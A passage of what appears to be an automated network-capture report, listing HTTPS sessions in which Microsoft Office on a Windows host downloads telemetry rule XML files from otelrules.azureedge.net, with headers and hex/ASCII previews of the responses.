                                                                                        x-azure-ref: 20241101T124700Z-16ccfc49897bnsqjhC1DFWhxb800000000m000000000f7tf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:00 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        131192.168.2.44989713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:01 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:01 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1389
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                        x-ms-request-id: 35c288dd-301e-0051-0308-2c38bb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124701Z-16dc884887bvg6x5hC1DFW86ag00000000hg000000007anr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:01 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        132192.168.2.44989613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:01 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:01 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1358
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                        x-ms-request-id: a281a3fe-c01e-008d-2008-2c2eec000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124701Z-16dc884887b6v426hC1DFWstvw00000000f0000000007fk8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:01 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        133192.168.2.44989913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:01 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:01 UTC517INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1405
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                        x-ms-request-id: c5ab768f-801e-007b-5c7c-2ae7ab000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124701Z-159b85dff8fc5h75hC1DFWntr800000002f000000000c5tw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:01 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        134192.168.2.44990013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:01 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:01 UTC517INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1368
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                        x-ms-request-id: 6c1a7512-101e-00a2-6d08-2c9f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124701Z-16ccfc49897w2n6khC1DFW5wd800000000gg000000009pgh
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:01 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        135192.168.2.44990113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:02 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:02 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE055B528"
                                                                                        x-ms-request-id: 39dcf0eb-f01e-0085-6308-2c88ea000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124702Z-16dc884887bj94q5hC1DFW11e400000000cg000000000rdg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:02 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        136192.168.2.44990213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:02 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:02 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE1223606"
                                                                                        x-ms-request-id: c82f2775-f01e-00aa-7936-2c8521000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124702Z-16ccfc49897nrfsvhC1DFW8e0000000000t0000000003x2m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:02 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        137192.168.2.44990313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:02 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:02 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                        ETag: "0x8DC582BE7262739"
                                                                                        x-ms-request-id: b98585e4-601e-0001-4608-2cfaeb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124702Z-16dc884887bj94q5hC1DFW11e400000000eg000000000sg2
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:02 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        138192.168.2.44989813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:02 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:03 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1352
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                        x-ms-request-id: 87c6e9c6-f01e-003c-7508-2c8cf0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124702Z-16ccfc49897hrp7xhC1DFW7ud400000000kg00000000a1rf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:03 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        139192.168.2.44990413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:02 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:03 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                        x-ms-request-id: 5d06e460-b01e-0084-1f08-2cd736000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124703Z-16ccfc49897hrp7xhC1DFW7ud400000000dg000000009ns8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:03 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        140192.168.2.44990613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:03 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:03 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                        x-ms-request-id: 397a9158-601e-0097-5408-2cf33a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124703Z-16ccfc49897jxxn9hC1DFWexyc00000000kg000000002266
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
